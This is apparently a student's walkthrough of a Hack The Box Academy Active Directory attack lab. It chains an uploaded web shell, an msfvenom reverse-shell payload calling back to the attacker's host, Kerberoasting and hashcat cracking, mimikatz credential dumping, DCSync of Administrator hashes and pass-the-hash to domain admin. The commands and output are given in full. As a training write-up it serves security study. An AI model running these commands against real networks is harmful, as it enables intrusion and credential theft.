HTB Acad AD Attack Module Final Assessment
Part I
Getting a shell
We are given a web server that is running aspx. It has file upload vulnerability. In the /uploads there is a web page where we can run Powershell commands.
my first goal was to get a shell on my Linux attack machine. So I used msfvenom to craft a shell and ran a simple http server:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.238 LPORT=9999 -f exe > shell.exe
python3 -m http.server 8080On the web server fetched the shell:
Invoke-WebRequest -Uri "http://10.10.15.238:8080/shell.exe" -OutFile "C:\shell.exe"Before we run this shell on the server we need to start a meterpreter session:
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.15.238
LHOST => 10.10.15.238
msf6 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploitAfter that we run C:\shell.exe on the server and catch the shell.
Kerberoasting SPN
Before we do anything lets run the command powershell.exe to make sure we are using Poweshell.
First we enumerate all SPNs and look for account with SPN MSSQLSvc/SQL01.inlanefreight.local:1433:
setspn.exe -Q */*The username for this account is svc_sql
We could use the following commands to load the TGS for out target account:
Add-Type -AssemblyName System.IdentityModelNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"This will load the TGS for the target in memory. Normally we do it using Mimikatz but we don't have it installed on the web server machine. So I first load it into our machine and download it in the web server:
Invoke-WebRequest -Uri "http://10.10.15.238:8080/mimikatz.exe" -OutFile "C:\mimikatz.exe"We run mimikatz.exe and we extract the TGS from memory. We run the following two commands. One to change the output to base64 blob and one to extract:
base64 /out:true
kerberos::list /exportWe copy the hash and paste it in a file lets call it sql_b64. next we turn it into .kirbi file:
cat sql_b64 | base64 -d > sql.kirbiThen we run kirbi2jon to make it ready to crack with hashcat:
kirbi2john sql.kirbi > hash_file
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' hash_file > sql_hashcatFinally, we crack it using hashcat:
hashcat -m 13100 sql_hashcat /usr/share/wordlists/rockyou.txtAccessing MS01
Now that we have a valid credential for the account svc_sql and its password, we can setup a PSSession to connect to MS01.
First we create the credential:
$username = "inlanefreight\svc_sql"
$password = "lucky7"
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ($username, $securePassword)Then we run:
Enter-PSSession -ComputerName "MS01.inlanefreight.local" -Credential $credAfter that we can look at the privs:
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session EnabledWe can confirm that RDP port 3389 is open. To be able to access it using RDP we need the IP of MS01:
Get-NetTCPConnection | Where-Object { $_.State -eq 'Listen' }
LocalAddress LocalPort RemoteAddress RemotePort State AppliedSetting
------------ --------- ------------- ---------- ----- --------------
:: 49672 :: 0 Listen
:: 49671 :: 0 Listen
:: 49670 :: 0 Listen
:: 49669 :: 0 Listen
:: 49668 :: 0 Listen
:: 49667 :: 0 Listen
:: 49666 :: 0 Listen
:: 49665 :: 0 Listen
:: 49664 :: 0 Listen
:: 47001 :: 0 Listen
:: 5985 :: 0 Listen
:: 3389 :: 0 Listen
:: 445 :: 0 Listen
:: 135 :: 0 Listen
0.0.0.0 49672 0.0.0.0 0 Listen
0.0.0.0 49671 0.0.0.0 0 Listen
0.0.0.0 49670 0.0.0.0 0 Listen
0.0.0.0 49669 0.0.0.0 0 Listen
0.0.0.0 49668 0.0.0.0 0 Listen
0.0.0.0 49667 0.0.0.0 0 Listen
0.0.0.0 49666 0.0.0.0 0 Listen
0.0.0.0 49665 0.0.0.0 0 Listen
0.0.0.0 49664 0.0.0.0 0 Listen
0.0.0.0 3389 0.0.0.0 0 Listen
172.16.6.50 139 0.0.0.0 0 Listen
0.0.0.0 135 0.0.0.0 0 Listenipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::d144:ccca:996b:abd5%4
IPv4 Address. . . . . . . . . . . : 172.16.6.50
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 172.16.6.1
Next, creating a portforward using meterpreter to use for RDP session to MS01 so we can RDP from our host:
portfwd add -l 7878 -p 3389 -r 172.16.6.50xfreerdp /v:localhost:7878 /u:"inlanefreight\svc_sql" /p:"lucky7"Lateral Movement
We can to get credentials for other users. Importing Mimikatz into MS01 which we have RDP access now will be useful. But MS01 cannot access our host directly so we need to use xfreerdp to mount our folder where we have mimikatz to the MS01:
xfreerdp /v:localhost:7878 /u:"inlanefreight\svc_sql" /p:"lucky7" /drive:Assess,/home/muhannad/Desktop/assessThen we can simply copy paste mimikatz.exe file. (that we can get from github).
privilege::debug
sekurlsa::logonpasswordsThis should give us the cleartext password for user tpetty. Now what can tpetty do? To enumerate further we need to transfer PowerView into the MS01 machine the same way we did mimikatz.
$sid = Convert-NameToSid tpetty
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}Now this user has Extended rights such as DS-Replication-Get-Changes-All which means we can do a DCSync attack.
If we run this command it will open another cmd under the context of our tpetty user:
runas /netonly /user:INLANEFREIGHT\tpetty powershellFor some reason mimikatz fails:
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account
ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)So we right click on PowerShell and select 'Run As A Different User' and put tpetty's creds as this user has the right to do DCSync:
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 4/11/2022 9:24:49 PM
Object Security ID : S-1-5-21-2270287766-1317258649-2146029398-500
Object Relative ID : 500
Credentials:
Hash NTLM: 27dedb1dab4d8545c6e1c66fba077da0
ntlm- 0: 27dedb1dab4d8545c6e1c66fba077da0
ntlm- 1: bdaffbfe64f1fc646a3353be1c2c3c99
lm - 0: 757743529af55e110994f3c7e3710fc9
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : b8bcb44123b3cc3bff20c663f1e0b94d
* Primary:Kerberos-Newer-Keys *
Default Salt : INLANEFREIGHT.LOCALAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : a76102a5617bffb1ea84ba0052767992823fd414697e81151f7de21bb41b1857
aes128_hmac (4096) : 69e27df2550c5c270eca1d8ce5c46230
des_cbc_md5 (4096) : c2d9c892f2e6f2dc
OldCredentials
aes256_hmac (4096) : 51d2b5ce03d6ea2e75e69050f32b927d0e602c2806dcb0d1dd0aacdda619a510
aes128_hmac (4096) : b93da9262f5ce0ed724ce0177366bc8a
des_cbc_md5 (4096) : 0876d604a7087cf7
OlderCredentials
aes256_hmac (4096) : 23cbc0dad348bebcbdbb4c82e9b23af299e8b56de358bafe24f2235f34497e4a
aes128_hmac (4096) : e35eb565af30c8ed79df5d8875508df6
des_cbc_md5 (4096) : 4904021983252cd5
* Primary:Kerberos *
Default Salt : INLANEFREIGHT.LOCALAdministrator
Credentials
des_cbc_md5 : c2d9c892f2e6f2dc
OldCredentials
des_cbc_md5 : 0876d604a7087cf7
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 c05d2bd2d448c260d63c391862358e9a
02 2ba60ae4300b00bd1a20b601f24e386a
03 cd2b7cce6ac8a39ac0a5a048feaa059a
04 c05d2bd2d448c260d63c391862358e9a
05 1084cdc6cf3b03a0425a0b4b6f8df2ab
06 4cbd7e1c07a9cd8f5d74821b8f7d73b5
07 a60dd8c295cfea5356e2e071336e4b73
08 9549ac69526305a3b52fc7eb81c36d5b
09 41883c94f1394d3f6420113ee9bde48b
10 cf77d4474145a014474eac18cb559026
11 9549ac69526305a3b52fc7eb81c36d5b
12 81319b4284c63dd5ecab7c53c41f2f4b
13 f586b7f78f320c2b7f7153e3adfa3d60
14 7ddf4411eb64636a952e01a3a6065213
15 581bab6ff054b23e65f14adc15126f9e
16 8638e61dd907d6ca411e1be885cf6ae2
17 fec8a8deb4f9320986e0deaae31c7974
18 f7dc49e2e0539d0e221b46139677c903
19 f405be39c0733cb794a2aca4b072f2a7
20 cf83e03b8abad7ae24a3b010cf3c7577
21 982dab323d8efa80ad1550985eb49e71
22 731741e7f2f621aaa2f446eb77997beb
23 b5928a821c656d267659d5eb5e4ab02d
24 020ab18e15e8a5fbd66748455afae6e5
25 4ac30d853103b2f8362243b72955d89f
26 9a0a62820b990a595affa9ac2119f299
27 5fda8e968eabd2561522cb2c2a918f56
28 224906fbb8c4570c87416aaee7b6419c
29 5632d3eb6e5fc24a09f67092988a92efPass-The-Hash
Finally we perform the pth attack. In the compromised machine run mimikatz in administrator mode. Then run this command with the hash:
sekurlsa::pth /user:Administrator /domain:inlanefreight.local /ntlm:27dedb1dab4d8545c6e1c66fba077da0 /run:cmd.exeThis will open a cmd with domain admin privilege. From here we can access the flag.txt in the desktop.
First we map the DC01 to our z: volume
net use Z: \\DC01\c$type Z:\Users\Administrator\Desktop\flag.txtLast updated
Was this helpful?